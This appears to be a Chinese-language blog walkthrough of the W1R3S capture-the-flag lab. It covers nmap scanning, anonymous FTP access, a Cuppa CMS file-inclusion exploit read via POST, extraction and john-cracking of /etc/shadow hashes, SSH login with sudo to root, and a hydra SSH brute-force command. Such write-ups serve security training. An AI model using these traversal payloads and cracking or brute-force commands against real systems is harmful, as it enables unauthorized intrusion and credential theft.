image.png
image.png

靶场介绍

靶场描述:

您已被雇用对W1R3S.inc个人服务器进行渗透测试并报告所有发现。他们要求您获得root访问权限并找到标志(位于/root目录中)。
获得低特权外壳的难度:初级/中级
获得权限升级的难度:初级/中级

靶场信息:

信息收集

1.主机发现(ping扫描)

1
nmap -sn 10.10.10.0/24
image.png
image.png
1

2.端口探测

1
nmap -sT -min-rate 10000 -p- 10.10.10.3 -oA 10.10.10.3
参数 使用方法
-sT TCP 扫描 namp -sT 10.10.10.3
-min-rate {发包速率值} 最小的发包速率 namp -sT -min-rate 10000 10.10.10.3
-p- 参数 -p 来指定设置我们将要扫描的端口号,-p-代表全部端口 namp -sT -p- 10.10.10.3,namp -sT -p80,3306 10.10.10.3
-oA {文件名} 可将扫描结果以标准格式、XML格式和Grep格式一次性输出 namp -sT 10.10.10.3 -oA 10.10.10.3
image.png
image.png

根据nmap扫描的扫描结果看目标机器开放了21,22,80,3306这4个端口
端口范围缩小再次使用namp开对其进行收集更详细的详细

3.端口信息收集

1
nmap -sT -sV -sC -O -p21,22,80,3306 10.10.10.3 -oA 10.10.10.3
-sT 获取端口的服务信息
-sV Version 版本检测扫描
-sC 根据端口识别的服务,调用默认脚本
-O 启用操作系统检测,-A来同时启用操作系统检测和版本检测
image.png
image.png
1
2
3
4
5
1.21端口开放ftp服务可以匿名登入
2.22端口开放Openssh服务版本为7.2p2
3.操作系统是ubuntu
4.80端口开放http服务
5.3306端口开放了数据库mysql的服务

漏洞探测

21 ftp

1
2
3
4
ftp 10.10.10.3
匿名登录:
	用户名:anonymous 
  密  码:Email或者为空
image.png
image.png
1
2
3
4
# Using binary mode to transfer files-->使用二进制模式传输文件
binary #切换二进制
?		 #查看命令
ls		 #查看文件
image.png
image.png
  1. 在ftp中有三个文件,别进入查看都是txt的文本是gte命令全部下载到本地进行分析
image.png
image.png
1
2
3
mget *.txt
get worktodo.txt
get employee-names.txt
image.png
image.png
image.png
image.png
image.png
image.png

  1. 分别对ftp下载的txt文件进行查看分析寻找有利信息

    1
    cat *.txt #查看所有的txt文件或者一个一个看
    image.png
    image.png

  2. New FTP Server For W1R3S.inc(没有获取什么有价值的信息)

image.png
image.png
  1. md5解密:This is not a password 翻译过来这不是密码(没有获取什么有价值的信息)
image.png
image.png

base64解密(没有获取什么有价值的信息)

image.png
image.png
  1. 员工名单可以注意一下,员工名字可能是账号,在遇到登入的时候可以作为爆破字典
image.png
image.png
  1. 该文件看样子是倒过过开和反序了
    image.png
    image.png
    使用工具或者截图下来旋转一下

https://www.upsidedowntext.com/

image.png
image.png
image.png
image.png

没有获取什么有价值的信息

  1. 分析结果总结
    1
    2
    3
    4
    5
    6
    7
    1.user:
    	Naomi
    	Hector
    	Joseph
    	Albert
    	Gina
    	Rico

3306 mysql

21端口没有发现尝试一下3306端口

1
mysql -h 10.10.10.3 -u root -p
image.png
image.png

无法连接

80 http

访问80http搭建的服务

image.png
image.png

这是一个apache的默认页面,没有发现可以利用的

目录扫描

1
dirsearch -u 10.10.10.3
image.png
image.png

目录扫描发现有有价值信息
1.http://10.10.10.3/administrator访问后发现这是一个Cuppa CMS框架的安装页面

image.png
image.png

2.http://10.10.10.3/javascript访问后报错403

image.png
image.png

3.http://localhost/wordpress和http://localhost/wordpress/wp-login.php很明显这是wordpress这是一个博客框架不过无法正常访问尝试需要更改访问,依旧无法访问

image.png
image.png

2,3点都无法访问,那重点放到Cuppa CMS框架的安装页面上
使用浏览器对其框架进行历史漏洞搜索或者使用kali中的searchsploit 工具查看是否有历史漏洞

image.png
image.png

搜索发现在这个Cuppa CMS框架的安装页面上存在文件包含漏洞

searchsploit搜索

1
2
3
searchsploit cuppa cms
searchsploit cuppa -m 25971.txt
cat 25971.txt
image.png
image.png

漏洞利用

根据25971.txt文档利用文件包含漏洞读取文件

1
/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
image.png
image.png

无法正常的读取,使用post进行尝试
利用插件hackBar来post发包或者使用burp

image.png
image.png

post读取正常可以利用

1
../../../../../../../../../etc/shadow
image.png
image.png
image.png
image.png

保存这些有哈希的用户

1
2
3
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::

john解哈希

1
john 10.10.10.3.hash
image.png
image.png
1
2
3
4
user1:w1r3s 
passwd1:computer
user2:www-data
passwd2:www-data
1
ssh [email protected]

登入成功

image.png
image.png

提权

1
sudo -l #显示出自己(执行 sudo 的使用者)的权限
image.png
image.png

发现w1r3s用户有root权限,无需提权

flag

1
cat flag.txt
image.png
image.png

扩展

image.png
image.png

最后没有利用到22端口,可以利用字典来对22端口进行一个爆破

1
hydra -L user.txt(用户名字典) -P passwd(密码字典) ssh://10.10.10.3 -t 4
image.png
image.png

免责声明
本博客所分享内容仅用于网络安全技术讨论,切勿用于违法途径
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法